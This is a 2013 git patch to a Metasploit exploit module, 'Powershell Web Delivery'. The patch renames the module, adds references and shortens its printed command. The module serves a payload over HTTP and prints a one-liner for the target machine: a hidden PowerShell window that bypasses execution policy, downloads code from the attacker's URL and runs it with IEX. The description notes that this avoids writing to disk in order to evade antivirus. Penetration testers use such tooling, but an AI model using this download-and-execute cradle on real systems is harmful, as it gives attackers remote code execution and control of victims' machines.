From f79d3f759167ae54ae7f5cadea6c7a8a62d01aa9 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 24 Jul 2013 17:48:03 +0100
Subject: [PATCH] Shorten cmd

---
 modules/exploits/windows/misc/psh_web_delivery.rb | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 83e09ffd133a..382a2b6c8f33 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -14,12 +14,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		 => 'Powershell Web Delivery',
+			'Name'		 => 'Powershell Payload Web Delivery',
 			'Description'	 => %q{
 				Quickly fires up a web server that serves the payload in powershell.
 				The command will start powershell and then download and execute the payload.
 				You can extract the IEX command to execute directly from powershell.
-				The main goal of this module is	that a session can be quickly established
+				The main purpose of this module is to quickly establish a session
 				on a target machine when you have to manually type in the command yourself,
 				e.g. RDP Session, Local Access or maybe Remote Command Exec.
 				This does not write to disk so is unlikely to trigger AV solutions and will
@@ -36,7 +36,9 @@ def initialize(info = {})
 				],
 			'References'	 =>
 				[
-					[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ]
+					[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
+					[ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+					[ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
 				],
 			'Platform'	 => 'win',
 			'Targets'	 =>
@@ -58,7 +60,7 @@ def primer
 		url = get_uri()
 		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
 		print_status("Run the following command on the target machine:")
-		print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
+		print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
 	end
 end